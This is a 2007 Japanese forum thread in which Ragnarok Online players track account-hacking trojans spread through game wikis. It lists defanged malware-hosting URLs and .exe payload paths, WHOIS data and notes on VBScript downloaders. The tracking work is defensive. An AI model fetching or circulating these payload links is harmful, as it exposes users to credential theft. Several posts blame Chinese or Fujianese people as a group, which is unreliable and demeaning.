77 名前:(^ー^*)ノ〜さん :07/03/18 05:22 ID:/9u8eReN0
>>68
所謂「不正アクセス防止法」の公訴時効は3年。
ttp://ja.wikipedia.org/wiki/%E5%85%AC%E8%A8%B4%E6%99%82%E5%8A%B9
ttp://www.ipa.go.jp/security/ciadr/law199908.html
せめて被害相談だけでも出しておいた方がいいぞ。

78 名前:(^ー^*)ノ〜さん :07/03/18 17:06 ID:OC9hsB2C0
ちょいと質問させてください。

普段、スレを見るときはJane Viewを使っています。
たとえばレス中にアドレスが書いてあった時にカーソルを合わせると
接続先の情報がポップアップ(?)みたいな形で表示されると思うんだけど
カーソルを合わせたアドレスがアカハクアドだった場合はアウトかな?

79 名前:(^ー^*)ノ〜さん :07/03/18 18:25 ID:kMaGcawd0
>>78
>>1
>一般的なセキュリティ 対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

>セキュリティ対策、質問・雑談スレ
> ttp://enif.mmobbs.com/test/read.cgi/livero/1173878067

80 名前:(^ー^*)ノ〜さん :07/03/18 20:07 ID:OC9hsB2C0
>79
失礼しました。
該当スレにて再度質問してみることにします。

81 名前:(^ー^*)ノ〜さん :07/03/18 22:32 ID:3FVFMCr10
アドレス的には既出だけど使用報告は初めてな気がするので貼り。
アプリコットカフェ(アコプリスレの外部板)の質問スレより

>688 名前:みなシャン MAIL: 投稿日:2007/03/18(日) 18:16:02 [ Z1.wJwWo ]
>
>新規頭装備リスト
>
>リヒタルゼン追加頭装備アイテム情報 [2006/11/15] 韓国サクライ実装)
>■新規頭装備リスト
>■新規武器リスト
>■新規防具リスト
>
>韓国サーバーの情報ですがこのまま実装されるというものではありませ・B
>画像は一部国際サーバーのものを使用してます。
>随時更新しておりますのでリロードしてください。関連サイトを参照して下さい
>www■cityhokkai■com/links/

最近アプリコへの爆撃が増えた気がする……

82 名前:(^ー^*)ノ〜さん :07/03/19 03:01 ID:Gv5p/75R0
別ゲームですが、Master of Epicのアップローダにもハック偽装jpgが張られたようです。
張った時のコメントも「Dツアー」と、MoEユーザーならわかるような言葉で張られていました。
中身は www■zhangweijp 飛ばしのものでした。
MoEも狙われてきているようですので、プレイしている方は注意。

この先ネットゲームは延々こういったものを恐れながらプレイしていくことになるんですかね・・・

83 名前:& ◆rBHtNzxqKY :07/03/19 11:36 ID:Y5FMsPMT0
いつもの調査中に見つけたもの

| それぞれ遊ぶ大全書 疑問の伝言のコンサルティングがあります!
| http://www.RAGNAROX■mobi/bbs

Registrant ID:hc883359917-cn
Registrant Name:lin bao
Registrant Organization:lin bao
Registrant State/Province:Fujian
Registrant Country:CN

Name: baobao123.w23.cndns■com
Address: 60.190.228.76
Aliases: www.ragnarox■mobi

脆弱性が放置されている環境でダウンロードさせられる svch.exeは、
Power Adapterサービスを作成するタイプのもの。
Trojan-PSW.Win32.Maran.cz との判定。

>>82
やるべきことさえきちんとやっていれば「恐れる」必要は
ないんじゃないでしょうか。

84 名前:(^ー^*)ノ〜さん :07/03/19 13:35 ID:k7470Fvr0
>>83
またも福建(Fujian)人ですね。

baobao123■w23■cndns■com/bbs/
からもwww■ragnarox■mobi/bbs/の実行ファイルを呼んでいるようだ。

これを書いている時点では後者はソースチェッカーで危険と出たが、前者はまだ出てないな。

ちょっとそれるが
垢ハククラックは中国国内のサイトもやられてるみたいだ。
------------------
中国の大手サイトでマルウェア感染、スーパーボウルと同じ攻撃者?
3月19日13時2分配信 ITmediaエンタープライズ

 中国の大手サイトにトロイの木馬やパスワード窃盗コードが仕掛けられているのが見つかったとして、セキュリティ企業のWebsenseがアラートを公開した。
 Websenseによれば、Microsoftのパッチを当てていないユーザーが問題のサイトを訪れると、エンドユーザーが何も操作しなくても脆弱性を悪用してエクスプロイトコードが実行される。外部のサイトからロードされるファイルでキー入力をキャプチャし、ユーザー情報を盗み出す仕掛けになっているという。
 コードが仕掛けられたサイトの中には中国で人気の書籍販売サイトなどもあり、いずれもハッキングされて細工を施したIFRAMEタグが挿入されたと見られる。
 中国サイトの悪質コードについてはSymantecもブログで報告、その1例として「Lingling」を挙げている。

 攻撃者はハッキングしたWebサイトにSQLインジェクションを使ってIFRAMEタグを挿入し、WebブラウザでJavaScriptをロードさせる。このJavaScriptにはInternet Explorer(IE)のさまざまなエクスプロイトコードが含まれ、ここからLinglingがダウンロード・実行される。
 Linglingは、インストールされるとユーザーがゲーム「World of Warcraft」をプレイするのを待ってメモリをスキャンし、ユーザー情報を探し出して攻撃者に送信する。攻撃者はこの情報でアカウントにログインし、仮想アイテムを盗んで売り払い、現金に換えようとする。
 米国では今年、スーパーボウル会場のドルフィンスタジアム公式サイトにIFRAMEタグが仕掛けられる事件が起きたが、Linglingにはこれと同じ攻撃者が関与しているとSymantecは見る。
 中国ではLineageやWorld of Warcraftなどのオンラインゲームに興じるユーザーが多いため、必然的にこうしたゲームのユーザー情報を盗み出すコードが増えるとSymantecは解説している。
------------------

人が多いサイトや人気サイトを狙う、IFRAME、オンラインゲーム狙いのトロイの共通項。
福建人の仕業にまず間違いないな。

85 名前:(^ー^*)ノ〜さん :07/03/19 17:31 ID:/K8gVsHO0
いっそ各職業Wikiのタイトルに天安門や民主主義って名前入れておけば
防衛になるのだろうか・・・

86 名前:(^ー^*)ノ〜さん :07/03/19 19:44 ID:k7470Fvr0
リネージュ資料室に以下のドメインが記載
www■ahwlqy■com

これは/に直接罠を置いている典型的なトラップドメイン。
123と言う名の実行ファイルが置いてあった。
ただしモノが古いのかClamWinでも検知可能。
QQと言う部分から本来はメッセ狙い?
QQメッセと言うのがあちらでは流行っているとか。

カスペルスキー
infected by Trojan-PSW.Win32.QQPass.qa

F-Secure
Trojan-PSW.Win32.QQPass.qa

ClamWin
Trojan.Spy-2429 FOUND

87 名前:(^ー^*)ノ〜さん :07/03/20 07:58 ID:RtLcOLkoO
今RMC見たら何やらカスペがトロイを検知
即隔離されたんで消して今再度ウィルススキャン中

昨日見たときは反応しなかったのに・・・

88 名前:(^ー^*)ノ〜さん :07/03/20 08:11 ID:nce5HtXN0
RMCの何処の何を見て、何のウイルスがかかったか書かないと不安煽るだけなんだけど

89 名前:(^ー^*)ノ〜さん :07/03/20 08:16 ID:RtLcOLkoO
すまん、いきなりでかなり焦ったからウィルス名をメモるの忘れてた・・・

検知したのはRMCを開いた瞬間だったからトップページだと思う

90 名前:(^ー^*)ノ〜さん :07/03/20 08:25 ID:nce5HtXN0
Firefox+NOD32(2127)でTOP開いてみたけど反応なかった

91 名前:(^ー^*)ノ〜さん :07/03/20 08:43 ID:RtLcOLkoO
何度も申し訳ない
カスペの処理内容に名前が残ってた

スクリプト:ttp//www5.big.or.jp/〜haya/rmc/[2]に新しい種類のトロイ
Trojan-Spy■HTML■Amazonfraud■pを検知しました

■部分は.です。
アマゾンってのが良くわかんないが
これはハック関係とは無縁・・・?

92 名前:(^ー^*)ノ〜さん :07/03/20 08:50 ID:6vMO7Mbv0
ttp://d■hatena■ne■jp/Maybe-na/20070316/1174047076
に飛んでも何も表示されない
これはハック関係とは無縁・・・?

93 名前:(^ー^*)ノ〜さん :07/03/20 08:54 ID:hMt7qcaF0
>92
>1
>重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

94 名前:(^ー^*)ノ〜さん :07/03/20 09:07 ID:nce5HtXN0
>>91
ウイルスには違いないようだけどググっても情報不足のよう…
カスペのウイルスリストにもないから何とも言えない

>>92
確実に垢ハックの書き込みとかURLならこっちで報告が良いと思うけど
これってそうなの?的なのはLiveROの方が適しているからそちらで
URLググってみると普通のはてなサイトみたいだけどね

95 名前:(^ー^*)ノ〜さん :07/03/20 09:19 ID:JJh8dEKe0
>>87
RMCを開いたのはブックマーク経由でしたか、どこかからのリンクでしたか。
9時現在 IE7 + SAV, Firefox + AVS の複数の環境で確認するも無反応です。
ざっと眺めたソースにもそれっぽいもの見当たらず。

現象が確認できないので、まだなんともいえません。


なお、これを■置換するのは全然意味がありません。
| Trojan-Spy■HTML■Amazonfraud■pを検知しました

96 名前:(^ー^*)ノ〜さん :07/03/20 09:36 ID:RtLcOLkoO
IE開く→お気に入りからRMC→カスペ反応→即削除って流れです。
こちらも再度スキャンしてみましたが他には特に変化なし・・・

置換についてはやった方が良いのかわからなかったので
とりあえずやっておきました。


メンテ前にやろうと思ってたけど少し様子見してみます・・・

97 名前:(^ー^*)ノ〜さん :07/03/20 10:09 ID:1GbUqaV80
こちとらRMCを最後に閲覧したのが昨日の20時くらい
今カスペ通したけど特に反応なし

アマゾンの広告関係なのかな?
検索したけどめぼしい情報は得られず…

98 名前:(^ー^*)ノ〜さん :07/03/20 13:04 ID:E3QsfaJw0
>87-97
>1
>重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

セキュリティ対策、質問・雑談スレ
 http://enif.mmobbs.com/test/read.cgi/livero/1173878067
此方に移動して下さい。此方はどちらかというと『(事前の)対策スレ』であり
(事後の)『対応スレ』ではありません。

99 名前:(^ー^*)ノ〜さん :07/03/20 13:22 ID:MqfL/Zpv0
突然すみません。さっき騎士wikiにあった垢ハック踏んだっぽいです。
とりあえずの対処として、OS再インスト(パーティションのフォーマットしなおし)
しておけば何とかなりますか?

100 名前:(^ー^*)ノ〜さん :07/03/20 13:23 ID:5KfMRhuO0
おk

101 名前:(^ー^*)ノ〜さん :07/03/20 13:24 ID:MqfL/Zpv0
すれ違いでした。

102 名前:(^ー^*)ノ〜さん :07/03/20 13:24 ID:MqfL/Zpv0
スレ違いなのに返信ありがとうございました。

103 名前:前スレ652 :07/03/20 13:42 ID:Y0U5EV5IO
あれから一応進展があったんだけど、書き込むのは
セキュ雑談スレの方がいいかね?

104 名前:(^ー^*)ノ〜さん :07/03/20 13:59 ID:bcOjnkLS0
そうさね。んで、重要な事はこっちにあとからコピペってもいいし。

105 名前:(^ー^*)ノ〜さん :07/03/20 16:13 ID:A9USNbor0
鯖板に立てられていた垢ハックスレ。

1 Saraの中の名無しさん 07/03/20 16:04:22 ID:Vv7V0MKq
キャラスロ増加決定記念スレ立て

みんなでOD臨とかGD臨とか や ら な い か

前スレwww■din-or■com/bbs

106 名前:(^ー^*)ノ〜さん :07/03/20 18:14 ID:1GbUqaV80
>>98
新種のウイルスの可能性がある上に
検出した場所が場所なんだからここでいい気がするんだが
向こうのスレでも言われていたが
だったら初めからテンプレ以外書き込み禁止とかにすれば?と思った

107 名前: ◆sp4Sh9QXGI :07/03/20 19:18 ID:PRs0mB+v0
どうも、中の人です。
朝に更新しましたが書き込めていなかったようなので再度。

ragnarox■mobi、ahwlqy■com共に未出IPです。
PG2リストは通常版、積極版両方を更新していますのでご確認ください。

Name: ahwlqy■com
Address: 61.188.38.46

Name: ragnarox■mobi
Address: 202.75.223.131

#スレが分かれてから未出報告分の抽出がしやすくなり、助かっております。
#あまり厳密にすると自治厨UZEEEEEとか言うのも出てきそうですが。
#まぁそういうのはほっときましょう、ハイ。

108 名前:(^ー^*)ノ〜さん :07/03/20 20:24 ID:oVnOO7Mv0
アコプリwikiに「新頭装備」の項目が追加され以下の項目が追加されてました。
>>76 >>105や前スレ>>742のアドレスと同様ですね。ここやたら活動してるみたい。
ぷにるで全オフでログとってみたらフレームやスクリプトで連鎖してて
最終的に www■interzq■com/bbs/t1■exeを開く仕掛けやね。
-------------------------------
ニブルヘイム実装と一緒に新しい頭装備ができました。みんなで新しい頭装備をつけてツアーに行きま

した。クマとカウボーイハットは借り物です。寒い格好してるダンサーに暑苦しいクマ帽。頭蒸れてま

す。
www■din-or■com/bbs
-------------------------------

109 名前:(^ー^*)ノ〜さん :07/03/20 21:26 ID:s6QJYaIS0
アップデートも滞り、更新するような内容もあまりないだろうし
wikiはしばらく編集不可、閲覧のみ可能にしてみたらどうだろうか

これだけ荒らされるとね・・・wikiも怖くて見れませんよorz

110 名前:(^ー^*)ノ〜さん :07/03/20 21:39 ID:tLEX/0ke0
管理状況に難があると思うところがあれば、
そのwikiを持っている各スレで、一度提言してみてはどうだろうか。
中の人もたぶん見ていると思うし。




某wikiで実際にそうしてるんだけど、その「しばらく」の解除時期が見えなくて困る。

111 名前:(^ー^*)ノ〜さん :07/03/20 22:00 ID:oVnOO7Mv0
進言はしてみたけどどうだろうね。
どちらにせよワンクッションないWikiはかなり危ない。

112 名前:(^ー^*)ノ〜さん :07/03/20 22:42 ID:AIRyWvhg0
雑談池ハゲ

113 名前:(^ー^*)ノ〜さん :07/03/20 23:52 ID:JJh8dEKe0
機械翻訳系の怪しい日本語文を伴うアカハックURL書き込みが
昨日今日は特に活発なので動向に注意してください。
最近の傾向として、新ドメインの取得ペースは減少。
数ヶ月前に良く見かけたドメインの再利用が目立ちます。


>>109
凍結するなり読み取り専用にしてしまえば、(アカハック)spamとか
こないだろうことは百も承知なんですが、いろいろな努力をしつつ
あえて「Wikiであること」を維持している管理者がほとんどでしょう。

それでは困るっていうなら、有志でWikiの静的ミラーサイトでも
立ち上げるのも一つの手ではあります。
Wikiのコンテンツについては「誰かのもの」じゃありませんし。
# ただし、そこまで現Wiki管理者にやれというのは筋違いと思います。

>>110
それいったら、ROつぶれるまで解除は無理なんじゃないかと。

--
繰り返しますが、踏まないことより踏んでも痛くないように
しておくのが正しいのです。

# でも、踏んづけちゃったとき、どんな対策がしてあったとしても
# 当人が大丈夫という確信を持てない以上、他人にできる助言は
# 「再インストールが確実」と言うことだけな現実。


>>112
誘導はともかくとして、
書き込みを躊躇するような雰囲気作りは、むしろ有害に思えますが。

114 名前:(^ー^*)ノ〜さん :07/03/21 08:46 ID:BikmjAmN0
職業別wikiと未実装wiki、blog、RO日記など
最近やたらと垢ハクURLが張られてるからノートンやウイルスバスター使ってる奴は注意しろよ
迂闊に飛ぶと垢ハクされて終わるぞ

115 名前:(^ー^*)ノ〜さん :07/03/21 09:17 ID:vXvVA3bc0
>>114
ノートンは結構反応がすばやい感じがする。
実際アカウントハックウイルスのアドと知りつつソースを見ようと
HTMLをDLしたら消されてた。

あと垢ハクが張られるWikiとそうでないWikiに分かれてる気がする。

116 名前:(^ー^*)ノ〜さん :07/03/21 09:22 ID:P1n9nGzJ0
意味無しコメントアウトしてる奴って何なんだろう

117 名前:(^ー^*)ノ〜さん :07/03/21 10:19 ID:nyEddoq30
>>115
マジレスするとノートンは対応が遅いから駄目

118 名前:(^ー^*)ノ〜さん :07/03/21 11:05 ID:AiCyPouy0
これを発見。
shoopivdoor■w19■cdnhost■cn/fczdun/

www■shoopivdoor■com/fczdun/wu.htm 単なる画像
www■shoopivdoor■com/fczdun/wu.htm 罠本体


cdnhost■cnは四川省成都のネットサービス?
IPも四川省と出ている。

後者が本体だが、登録情報に変化が現れた。
郵便番号が四川省成都市(610000)になっていることに注意。

ドメインIP、住所が福建省なのにね。


Domain Name ..................... shoopivdoor■com
Name Server ..................... ns1.dnsfamily.com
ns2.dnsfamily.com
Registrant ID ................... hc210030550-cn
Registrant Name ................. zhiqiqnag lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian
Registrant City ................. longyan
Registrant Province/State ....... fujian longyan (福建省竜岩)
Registrant Postal Code .......... 610000 (四川省成都)
Registrant Country Code ......... CN

119 名前:(^ー^*)ノ〜さん :07/03/21 11:13 ID:AiCyPouy0
単なる画像のほうは wu ではなくて wz ね。
サイズ0で呼び出しているimg.gifと言うのが何者なのかわからないけども。

120 名前:(^ー^*)ノ〜さん :07/03/21 12:47 ID:AiCyPouy0
TEACUP掲示板はプロキシ使われまたあちこち爆撃されている模様。

ここ最近の書き込みを調べるとこのリモホが目立つ、禁止ホストにしておいたほうがいい。
cache.telstra.net

121 名前:(^ー^*)ノ〜さん :07/03/21 13:03 ID:VrQ0sBK/0
アコ、プリ持ちは垢ハクサイトのURL踏まないように中止・・・

122 名前:(^ー^*)ノ〜さん :07/03/21 13:13 ID:8XRE24nA0
中華やりたい放題だなw

123 名前:(^ー^*)ノ〜さん :07/03/21 13:34 ID:NZa2cjDk0
>118
そのwu.htmにはVBScriptが仕込まれてる。
gifファイルは拾えなかったが、ダミーの可能性あり。

VBScriptはアスキーコードで書かれていて、デコードすると
これまたVBSなコードになり、それをExecuteしてる形。

デコードしたコードをテキストに保存したところ、カスペで
Trojan-Downloader.VBS.Psyme.ds と検知。

www■shoopivdoor■com/fczdun/ro.exe
www■lovetw■webnow■biz/sigui/t2.exe
の2ファイルを読み込んでレジストリ登録する模様。

124 名前:(^ー^*)ノ〜さん :07/03/21 13:44 ID:NZa2cjDk0
>121
詳しく。
またアコプリのテンプレが改変されたとか?

アコプリスレでは避難所Wikiを立ち上げる話が出てたが、早急に
行動に出た方がいいかもしれないね……

125 名前:(^ー^*)ノ〜さん :07/03/21 13:47 ID:VeO0FkZd0
>>124
>アコプリスレでは避難所Wikiを立ち上げる話が出てたが、早急に
>行動に出た方がいいかもしれないね……

>>124

126 名前:にゅぼーん :にゅぼーん
にゅぼーん

127 名前:(^ー^*)ノ〜さん :07/03/21 15:43 ID:aUgQU45b0
>>126
死ね
http://enif.mmobbs.com/test/read.cgi/livero/1173878067/

128 名前:(^ー^*)ノ〜さん :07/03/21 15:53 ID:oszVrl4S0
http://www■game-fc2blog■com/chaos
が鯖スレに仕込まれてた。
踏んじゃったので仕方なくソースを見るとフレームソースとして
>>118の様に2つのhtmlが指定されていた。

vbs駆動のようなのでFirefoxで見た場合はセーフ?
踏んだ跡に思ったのですがFirefoxのキャッシュフォルダってどこにあるんでしょうか?

129 名前:(^ー^*)ノ〜さん :07/03/21 17:05 ID:yeCKdJy50
>>126
削除依頼は出てるみたいだけど、このURLは間違っても開いてはいけません。

130 名前:(^ー^*)ノ〜さん :07/03/21 17:23 ID:zN/b/eTi0
踏んじゃったんだけどどうすればいいの;;
なんか真っ白なページが表示されただけだから大丈夫なの??
。・゚・(ノД`)ウワーン

131 名前:(^ー^*)ノ〜さん :07/03/21 17:29 ID:AxVRvmBF0
>>126

>>1
>>4
>>10


>>128
C:\Documents and Settings\ユーザー名\Local Settings\Application Data\Mozilla\Firefox\Profiles\(英数字の羅列).(プロファイル名)\

132 名前:(^ー^*)ノ〜さん :07/03/21 17:34 ID:qxnL8I300
>>130
126の事なら踏んだ時点でアウト。とにかくここにも張られるURLでも迂闊に踏まない事が重要。

HDDフォーマットしてOSインストが無難。
絶対にそのPCでROにログインしようとしたりアトラクションセンターにログインしないように!

とりあえず詳しく聞きたいなら>>2のLiveROのセキュリティ対策、質問・雑談スレの方で聞いてみなされ。

133 名前:(^ー^*)ノ〜さん :07/03/21 18:03 ID:yeCKdJy50
>>126がにゅぼーんされたので■で伏せて掲載。
なお、これは絶対に開いてはダメです。

ttp://www■wikiwiKi-game■com/8651262/

134 名前:(^ー^*)ノ〜さん :07/03/21 19:09 ID:Ur5nmQ3F0
133のURL見てみた。ソース見たらVBScriptで
http://www■slower-qth■com/8651262/ファイル名■exe
の実行やレジストリ登録しようとしてる感じ。(ファイル名の部分はランダム英文字列)
スクリプト無効にしてなければ踏んだだけでアウトだろうね。

>>130
詳しいことを知りたければ132の誘導に従って貰うとして、でも一つだけ。
真っ白なページだから、という判断は無意味。
重要なのはそこに罠が仕込まれているかどうかだけであり、画像や文字表示の有無は大抵無関係。

135 名前:(^ー^*)ノ〜さん :07/03/21 19:12 ID:j90qqe2Z0
MMOBBSに貼られたのって、もしかして初めて?

136 名前:(^ー^*)ノ〜さん :07/03/21 19:54 ID:v2eob4ds0
直接対策スレに来るとは想定外だったな

137 名前:(^ー^*)ノ〜さん :07/03/21 20:06 ID:9QtE1gUL0
くそ中華め・・・
いい加減にしろまじ
もうゆるさん

138 名前:(^ー^*)ノ〜さん :07/03/21 20:20 ID:v2eob4ds0
中華にしてはうまく日本語で書き込んでるよな
日本人の仲介者とか居るんだろうか

139 名前:(^ー^*)ノ〜さん :07/03/21 20:23 ID:RcProxip0
雑談はこちらで
http://enif.mmobbs.com/test/read.cgi/livero/1173878067/

140 名前:(^ー^*)ノ〜さん :07/03/21 20:43 ID:w8AyVqAR0
アコ、プリスレが特に酷い
新装備とカードが追加されたと偽って垢ハクURLが張られまくっててね

141 名前:(^ー^*)ノ〜さん :07/03/22 00:01 ID:mQ5Z1zVK0
専ブラでうっかりgifファイル踏んだらデコードエラーとか出たんだがまさか垢ハックじゃないよな。
gifに偽装とか、ある話だっけ?

142 名前:(^ー^*)ノ〜さん :07/03/22 00:03 ID:Me/ZP5uT0
何処で踏んだかまで書かないとわからないわけで
そういったあやふやな事項は向こうのスレの方が適してるわけで
画像URLを貼り付ける際には「.」を「■」にすることを忘れないように

143 名前:(^ー^*)ノ〜さん :07/03/22 00:03 ID:72lg3B5W0
>>141
移動よろしく。

>>2
>【一般的話題用】
>セキュリティ対策、質問・雑談スレ
> http://enif.mmobbs.com/test/read.cgi/livero/1173878067

144 名前:(^ー^*)ノ〜さん :07/03/22 00:28 ID:h3QArhXd0
感染の心当たりはないんですけどキャラセレクト後のパスワード入力の時
ちょっと重くなったりログイン直後30秒くらいHDがガリガリいって
微妙に重くなってます。これは感染を疑ったほうがいいでしょうか?

145 名前:(^ー^*)ノ〜さん :07/03/22 00:32 ID:Me/ZP5uT0
>>144
>>143
誘導ついでに、それだけじゃアドバイスできない
起動時にnPro読み込みで重い場合も多々あると思う

146 名前:(^ー^*)ノ〜さん :07/03/22 01:51 ID:AEXU6wWD0
感染してんでしょうか?とかあいまいな質問は >>143
テンプレちゃんと埋めたり垢ハックの分析や情報収集みたいな明確な垢ハックの話題はこっち。

147 名前:(^ー^*)ノ〜さん :07/03/22 16:44 ID:sCNmfW9z0
【    ツールの使用の有無      】 (No)
【  ネットカフェの利用の有無    】 (No)
【     OS    】 (WinXP HomeEdition)
【使用ブラウザ 】 (IEVer分からず・・・)
【 アンチウイルスソフト 】 (当時は全セキュリティOFF状態)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでは検知無し)
【スレログやテンプレを読んだか】 (読み飛ばし含めてこのすれを一通り)
【説明】
昨日の夕方、上で報告のあった
http://www■game-fc2blog■com/chaos
を踏んじゃって、あわてて別窓のROをダウン。
ルーター接続の別PCにて全アカウントのキャラパスを変更。
踏んだPCはその間にカスペルスキーでチェック。
チェック結果からは何も出なかったけど、怖いので踏んだPCだけOS再インストール。
HDDは完全フォーマット済み。

今日仕事から帰ったらログインパスを変更して、ルータ接続の2台をカスペルでチェックする予定。
その他これやっといたほうがいいってのあればお願いします。
不安なのは踏んだPCがルータの接続のメインPCなこと・・・。

148 名前:(^ー^*)ノ〜さん :07/03/22 17:09 ID:ypQGPO8uO
>>138
知り合いに垢ハックされて腹いせにあちこちに貼ったとかいってる奴いたし
もはやどこに敵がいるかわからないぜゾンビ映画状態

149 名前:(^ー^*)ノ〜さん :07/03/22 18:26 ID:NKW7MVRk0
>>148
犯罪幇助で逮捕されっぞ。
ウィルスサイト貼ってるのと同じだしな。

150 名前:(^ー^*)ノ〜さん :07/03/22 18:36 ID:AEXU6wWD0
>>147
フォーマットまでやったならもう言うことないかと。
お手本みたいな対処だ。
あとはセキュリティソフトちゃんとつけとくくらいかな。

151 名前:(^ー^*)ノ〜さん :07/03/22 19:12 ID:AEXU6wWD0
セキュ対策スレ253から

http://www■fcty-net■com/
から
http://www■fcty-net■com/img/fcty■jpg
http://www■lovetw■webnow■biz/liang/lin■htm
を開こうとしている。
後者のHTMLの方からVBSやJavaスクリプトで以下のexeを開きExecuteしようとしてる模様。
さすがにファイル落としてはいない。
httP://www■lovetw■webnow■biz/liang/ro■exe
httP://www■lovetw■webnow■biz/liang/xia■exe

152 名前:(^ー^*)ノ〜さん :07/03/22 19:26 ID:z3pqbk4V0
スレ違いかも知れないけど、kaspersky Lab様に垢ハックウイルスの検体を提供しました

Hello.

New malicious software was found in the attached file.
Trojan-PSW.Win32.Maran.de
It's detection will be included in the next update. Thank you for your help.
-----------------
次回の更新で対応するそうです

一応報告です、スレ汚しすいません

153 名前:(^ー^*)ノ〜さん :07/03/22 20:17 ID:ItHx82PB0
>151
Domain Name ..................... fcty-net■com
IP Address: 222.77.185.101

いつもの福建人。

154 名前:(^ー^*)ノ〜さん :07/03/22 22:45 ID:xhAI0mnR0
垢ハックをくらい、装備アイテムをもってかれた人に質問します。
アイテムや装備って見境なく全部とられますか?

正直レアな装備なんか、とられても、またガンバルと思えるけど
他人からもらえた思い出のアイテムや装備も価値の有り無し見境無くとられる感じですかね?

バレンタインのチョコなんて中華に取られたりしちゃう?

155 名前:(^ー^*)ノ〜さん :07/03/22 23:05 ID:BEpZcQ5H0
>>154
多分liveRoの方のスレ向きかなぁ。

156 名前:408 :07/03/23 00:45 ID:8mhwb4+E0
Kaspersky Internet Security使いの人向けの
国別接続拒否フィルタルール作ってみたんだけど需要あるかな?
(要するに国丸ごとパケットフィルタで落とす乱暴技)
とりあえずCN, KR, TWつくってみたけど。
需要あるなら公開したいんだけど…このご時世にuploaderってのもちょっと危険かな?

あと、他の国っていままであったかな?(データが無くてUS扱いになるやつ以外に)

157 名前:(^ー^*)ノ〜さん :07/03/23 00:46 ID:8mhwb4+E0
ぐは_| ̄|○ 名前残ってた

158 名前:(^ー^*)ノ〜さん :07/03/23 01:11 ID:BMm41T+00
zipでクレ

159 名前:(^ー^*)ノ〜さん :07/03/23 01:12 ID:EyC4Tpgn0
>>156
興味あるので是非よろしく

160 名前:156 :07/03/23 01:24 ID:8mhwb4+E0
とりあえずMMOBBSアップローダーに投函 *'-')シ 三○
ttp://www.mmobbs.com/uploader/files/2326.zip

161 名前:(^ー^*)ノ〜さん :07/03/23 01:42 ID:BMm41T+00
|∀`)いただいた

カスペルスキー導入してるものの、あんまいじくって無いので
いい機会なので設定をいろいろ見てみるかな〜

162 名前:(^ー^*)ノ〜さん :07/03/23 12:36 ID:35NAzEtF0
>>150
ありがとうございます

163 名前:sage :07/03/23 16:35 ID:7vWoFTRn0
先日、垢ハックされました。
ログイン中に別の場所でのログインがされました。と表示されて
強制ログアウト。
その後パスワードを急いで変更しましたが7〜8分後にログイン出来たときには
裸で違うまMAPにいました。
メインキャラはキャラパスも変更されてる状態です。


当日に閲覧したサイトは、モンク、ソウルリンカー、ローグWIKI、RMCだけです。

アイテムは全部根こそぎやられました。
ウィルススキャンでは、ウィルスが検出されなかったので、
カスペルスキーの試用版で検索したところ、
Trojan-PSW.W32というウィルスが検出されました。

今思うと、いつもよりもラグがすごくログイン中も挙動が
おかしかったような気がします。
現在、ガンホーからの返事待ちの状態です。

初めて書き込みをするので読みにくかったらすいません。

164 名前:sage :07/03/23 16:40 ID:7vWoFTRn0
申し訳ないです。テンプレみてなかったです。
● 実際にアカウントハックを受けた時の報告用

【      気付いた日時          】 (3月21日)
【不審なアドレスのクリックの有無 】 (モンク、ローグ、ソウルリンカーWiki又はRMC)
【他人にID/Passを教えた事の有無】 (No)
【他人が貴方のPCを使う可能性の有無】 (No)
【    ツールの使用の有無      】 (No)
【  ネットカフェの利用の有無    】 (Yes)
【     OS    】 (WINDOWS XP home SP2 WINDOWS UPDATA最新)
【使用ブラウザ 】 (IE6)
【WindowsUpdateの有無】 (3月19日)
【 アンチウイルスソフト 】 (avest)
【その他のSecurty対策 】 (なし)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでTrojan-PSW.W32発見
【スレログやテンプレを読んだか】 (今から読みます)
【説明】
ログイン中に別の場所でのログインがされました。と表示されて
強制ログアウト。
その後パスワードを急いで変更しましたが7〜8分後にログイン出来たときには
裸で違うまMAPにいました。アイテムは全部根こそぎやられました。

メインキャラはキャラパスも変更されてる状態です。

165 名前:(^ー^*)ノ〜さん :07/03/23 16:42 ID:GWzNojBo0
報告おつ。先日ではなく、明確な日時が有るとよかったな。
>>3のテンプレを埋めて下記のスレに書込んで欲しい。

セキュリティ対策、質問・雑談スレ
 http://enif.mmobbs.com/test/read.cgi/livero/1173878067

駆除方法、警察への届け出、今後掛からない予防などの話題はそちらで扱います。

166 名前:(^ー^*)ノ〜さん :07/03/23 16:51 ID:FQDZfBbe0
パス変える前に急いでログインしなおしたほうがよかったんじゃないか?
とはいえ相手も準備してて一瞬でアイテム移動できる状況にしてあるだろうし難しいかもな

167 名前:(^ー^*)ノ〜さん :07/03/23 16:51 ID:Hf2VvQEm0
>>163のようなまさに垢ハク現場に直面した時って、ログイン合戦しつつ
ID、パス変えるしか手段ないのかな?
でも、マシン1台しか持ってなかったりすると、変えた情報も当然送られてる
から無駄か・・・。

168 名前:(^ー^*)ノ〜さん :07/03/23 16:53 ID:GWzNojBo0
>>166-167
移動よろ

169 名前:(^ー^*)ノ〜さん :07/03/23 17:02 ID:EAjpGLP30
ログイン合戦をしつつ・・・

・友人等に頼める場合は、緊急避難的にID、パスを教えて変えてもらう。
・PC2台以上ある場合は、他のPCは感染していないことを祈ってそっちで変える。
・PC1台のみの場合は、まずは裏作業で変えて数秒でもログインを遅らせ、
ウィルスチェックしつつ、数秒単位でID/パスを変え続ける。

相手が全く作業出来ほどのログイン合戦が大前提だけど、こんな感じでどうだ。

170 名前:(^ー^*)ノ〜さん :07/03/23 17:31 ID:GWzNojBo0
>>169
163-164は既に移動済み。

171 名前:(^ー^*)ノ〜さん :07/03/23 17:47 ID:T4qqV3IG0
特殊な事例だけど、被害に遭遇した人が最善手を打てるように対応手順を検討してみるか。

172 名前:(^ー^*)ノ〜さん :07/03/23 18:18 ID:k7/3P6cY0
キーロガーでIDパス盗まれる場合、単語登録であいでぃ→ID ぱす→passで変換出来るようにした方がいいんだろうか
ログイン合戦も素早く対応出来るけど、キャラパス抜けられるってことはSS送られてるってことだし意味なさそうだが・・・

173 名前:(^ー^*)ノ〜さん :07/03/23 18:32 ID:sACPDERj0
いつもの福建人が取得したドメイン
はてなの錯誤狙い?
